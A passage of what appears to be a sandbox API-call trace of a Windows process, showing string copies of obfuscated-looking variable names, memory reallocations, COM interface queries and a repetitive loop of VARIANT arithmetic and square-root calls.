strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QACwAA" | out: _Dst="_B_var_QACwAA") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QACwAA") returned 14 [0069.917] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b90386 | out: _Dst=0x144ec0) returned 0x0 [0069.917] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="i1A1ACk" | out: _Dst="i1A1ACk") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="i1A1ACk") returned 8 [0069.917] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9035e | out: _Dst=0x68767a0) returned 0x0 [0069.917] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_i1A1ACk" | out: _Dst="_B_var_i1A1ACk") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_i1A1ACk") returned 15 [0069.917] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9035e | out: _Dst=0x144ec0) returned 0x0 [0069.917] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="JU1AUAo" | out: _Dst="JU1AUAo") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="JU1AUAo") returned 8 [0069.919] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x8000) returned 0xaf1f520 [0069.923] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0xc10) returned 0xafbcad0 [0069.923] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbcad0, cb=0x1010) returned 0xafbcad0 [0069.923] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbcad0, cb=0x1410) returned 0xafd5e70 [0069.923] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x1810) returned 0xafd5e70 [0069.923] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x1c10) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x2010) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x2410) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x2810) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x2c10) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x3010) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x3410) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x3810) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x3c10) returned 0xafd5e70 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd5e70, cb=0x4010) returned 0xaf27530 [0069.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf27530, cb=0x4410) returned 0xafff880 [0069.925] IMalloc:Realloc (This=0x7fefec05380, pv=0xafff880, cb=0x4176) returned 0xafff880 [0069.925] IMalloc:Free (This=0x7fefec05380, pv=0x680aa60) [0069.925] GetCurrentProcess () returned 0xffffffffffffffff [0069.925] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0069.925] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0069.926] GetCurrentProcess () returned 0xffffffffffffffff [0069.926] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0069.926] GetCurrentProcess () returned 0xffffffffffffffff [0069.926] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0069.926] GetCurrentProcess () returned 0xffffffffffffffff [0069.926] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0069.926] GetCurrentProcess () returned 0xffffffffffffffff [0069.926] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0069.926] GetCurrentProcess () returned 0xffffffffffffffff [0069.926] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0069.926] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.926] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.926] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.926] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.926] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.926] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.926] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.926] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.926] VarCmp (pvarLeft=0xaeff6e0, pvarRight=0xaeff6c8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.926] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.926] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.926] VarDiv (in: pvarLeft=0xaeff650, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.926] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.926] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.926] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff378, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.926] VarCmp (pvarLeft=0xaeff348, pvarRight=0xaeff330, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.926] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff318, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.926] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.926] VarDiv (in: pvarLeft=0xaeff2e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.927] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff270, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarCmp (pvarLeft=0xaeff240, pvarRight=0xaeff228, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff210, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.927] VarDiv (in: pvarLeft=0xaeff1e0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.927] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff168, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarCmp (pvarLeft=0xaeff120, pvarRight=0xaeff108, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff0f0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.927] VarDiv (in: pvarLeft=0xaeff0c0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.927] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff048, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarCmp (pvarLeft=0xaeff018, pvarRight=0xaeff000, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefefe8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.927] VarDiv (in: pvarLeft=0xaefefb8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.927] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefef40, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] VarCmp (pvarLeft=0xaefeef8, pvarRight=0xaefeee0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.927] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeec8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.927] sqrt (_X=0x3) returned 0x4190000000000000 [0069.928] VarDiv (in: pvarLeft=0xaefee98, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.928] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefee20, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarCmp (pvarLeft=0xaefedf0, pvarRight=0xaefedd8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefedc0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.928] VarDiv (in: pvarLeft=0xaefed90, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.928] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefed18, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarCmp (pvarLeft=0xaefecd0, pvarRight=0xaefecb8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeca0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.928] VarDiv (in: pvarLeft=0xaefec70, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.928] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefebf8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarCmp (pvarLeft=0xaefebc8, pvarRight=0xaefebb0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeb98, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.928] VarDiv (in: pvarLeft=0xaefeb68, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.928] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeaf0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] VarCmp (pvarLeft=0xaefeac0, pvarRight=0xaefeaa8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.928] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefea90, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.928] sqrt (_X=0x3) returned 0x4180000000000000 [0069.928] VarDiv (in: pvarLeft=0xaefea60, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.929] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe9e8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarCmp (pvarLeft=0xaefe9a0, pvarRight=0xaefe988, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe970, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.929] VarDiv (in: pvarLeft=0xaefe940, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.929] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe8c8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarCmp (pvarLeft=0xaefe898, pvarRight=0xaefe880, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe868, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.929] VarDiv (in: pvarLeft=0xaefe838, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.929] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe7c0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarCmp (pvarLeft=0xaefe778, pvarRight=0xaefe760, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe748, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.929] VarDiv (in: pvarLeft=0xaefe718, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.929] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe6a0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] VarCmp (pvarLeft=0xaefe670, pvarRight=0xaefe658, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.929] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe640, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.929] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.930] VarDiv (in: pvarLeft=0xaefe610, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.930] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe598, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarCmp (pvarLeft=0xaefe550, pvarRight=0xaefe538, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe520, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.930] VarDiv (in: pvarLeft=0xaefe4f0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.930] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe478, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarCmp (pvarLeft=0xaefe448, pvarRight=0xaefe430, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe418, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.930] VarDiv (in: pvarLeft=0xaefe3e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.930] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe370, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarCmp (pvarLeft=0xaefe328, pvarRight=0xaefe310, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe2f8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.930] VarDiv (in: pvarLeft=0xaefe2c8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.930] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe250, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.930] VarCmp (pvarLeft=0xaefe220, pvarRight=0xaefe208, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.930] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe1f0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.931] VarDiv (in: pvarLeft=0xaefe1c0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.931] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe148, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarCmp (pvarLeft=0xaefe118, pvarRight=0xaefe100, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe0e8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.931] VarDiv (in: pvarLeft=0xaefe0b8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.931] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe040, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarCmp (pvarLeft=0xaefdff8, pvarRight=0xaefdfe0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdfc8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.931] VarDiv (in: pvarLeft=0xaefdf98, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.931] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdf20, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarCmp (pvarLeft=0xaefdef0, pvarRight=0xaefded8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdec0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.931] VarDiv (in: pvarLeft=0xaefde90, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.931] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefde18, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.931] VarCmp (pvarLeft=0xaefdde8, pvarRight=0xaefddd0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.931] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefddb8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.932] VarDiv (in: pvarLeft=0xaefdd88, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.932] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdd10, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarCmp (pvarLeft=0xaefdcc8, pvarRight=0xaefdcb0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdc98, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] sqrt (_X=0x3) returned 0x4190000000000000 [0069.932] VarDiv 